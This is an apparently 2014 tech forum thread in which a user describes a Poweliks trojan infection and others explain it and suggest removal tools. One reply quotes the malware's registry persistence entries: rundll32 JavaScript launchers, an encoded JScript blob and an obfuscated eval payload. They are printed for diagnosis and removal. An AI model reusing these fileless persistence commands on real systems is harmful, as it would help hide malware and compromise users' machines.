Trojan.Poweliks

dustymars · 12 Dec 2014

Well, picked up a nasty Trojan Wednesday and after working on it that night and the next morning I gave up and let Norton's support tech take care of it. Watch out for "Trojan.Poweliks" that looks like "TROJAN.AdClicker Activity" and some routine messing with MS Powershell. This was the first one of those things that in 50 years plus of computer world that was over my head. It was not from this site, but I know which one. How it got me is a total mystery. It appears to be attacking military related sites.

A Guy · 13 Dec 2014

https://www.sevenforums.com/security-...-registry.html

A Guy

Urthboundmisfit · 13 Dec 2014

Poweliks is a malware with rootkit-like features, it resides in the registry (loads in memory) is persistent and is not present as a file which can be scanned & removed easily. The payload (malware file) is stored in an encrypted registry value and is loaded at boot time by a key calling rundll32 process with an encrypted javascript payload.

Associated Poweliks Windows Registry Information:

HTML Code:

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current 

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1

HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 " " = "rundll32.exe javascript:"\.\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))"

HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 "a" = "<data to execute>"

Once the payload is loaded, it executes an embedded powershell script in silent mode. That powershell script contains another encoded payload which will be injected into a legitimate dllhost process (the persistent item), which acts as a trojan downloader for other malware & is also responsible for protecting the registry value by recreating it when removed.

Removal can be attained with these tools (+ additional scans - AV, MBAM, HitmanPro among others) after disabling/removing the persistent item .

Farbar Recovery Scan Tool: Farbar Recovery Scan Tool Download
RogueKiller (by Tigzy): Poweliks removal with RogueKiller
ESET Poweliks Cleaner How do I remove a Poweliks infection? - ESET Knowledgebase

The trojan wrecks several windows "defense" services - Security Center, Defender, Windoze Update, Firewall, etc
ESET Svcs Repair http://kb.eset.com/library/ESET/KB%2...icesRepair.exe <<<Direct DL link

ETA: Relevant links/analysis/removal instrux:

KernelMode.info
http://kb.eset.com/esetkb/index?page...nt&id=SOLN3587
http://www.adlice.com/poweliks-remov...h-roguekiller/
http://www.bleepingcomputer.com/viru...oweliks-trojan

dustymars · 13 Dec 2014

Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....

Urthboundmisfit · 13 Dec 2014

False positive...
VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

Did you read thru the comprehensive links in my post? :)

ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.

Urthboundmisfit · 13 Dec 2014

dustymars said:

Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....

Wait, whut????

I thought Norton support tech "took care of it"

dustymars said:

Well, picked up a nasty Trojan Wednesday...I gave up and let Norton's support tech take care of it. ...

Apparently, not so much.

Are you still infected?

dustymars · 13 Dec 2014

Urthboundmisfit said:

False positive...
VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

Did you read thru the comprehensive links in my post? :)

ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.

I use SUPERAntiSpyware, AdwCleaner,MBAM, I forget some, SpyBot maybe, and MalwareBytes' Anti Rootkit but none of them got rid of it.Norton's did and I checked it out, no more Trojan.I suspect some would like us to get rid of MNorton's and buy their product?This what I say, “Non Gradus Anus Rodentum..”

I said, Norton's did not like the Link you posted, so I will not discard it just because you suggest it. There are other ways to get it done. No I am not infected, or at least no traces of it are in my PC.

Urthboundmisfit · 13 Dec 2014

dustymars said:

...I suspect some would like us to get rid of MNorton's and buy their product?This what I say, “Non Gradus Anus Rodentum..”

My misunderstanding, though by your wording ("now what") I was under the impression you were still infected/had lingering effects.

I've never paid a cent EVER for any AV, never recommended any AV and never will. I am currently using Avast Free with only File system shield & Web shield... none of the other bells whistles & shiny objects being presented as "protection" these days.

As for Norton, to each his own, hence "YMMV". BTW, you're welcome for the info/links etc.

Unsubscribing...

dustymars · 13 Dec 2014

Plus, I certainly do not trust Microsoft for any security fro my PC given the glitches in their updates of late and holes they somehow forget. in their software. While some of the professional hackers may have the knowhow and some amateur hackers may have a few brain cells left, they are not smart enough to find the holes and make malware/viruses so it has to be some insider selling the information or a former disgruntle employee selling the information. I would not out it past the so-called anti-virus guys doing evil deeds either. Never trust anyone on the Net -- not even its inventor, AlGore.

The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.

Borg 386 · 13 Dec 2014

dustymars said:

The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.

Yepperz, lots of scam E Mails this time of year.

https://www.sevenforums.com/security-...irmations.html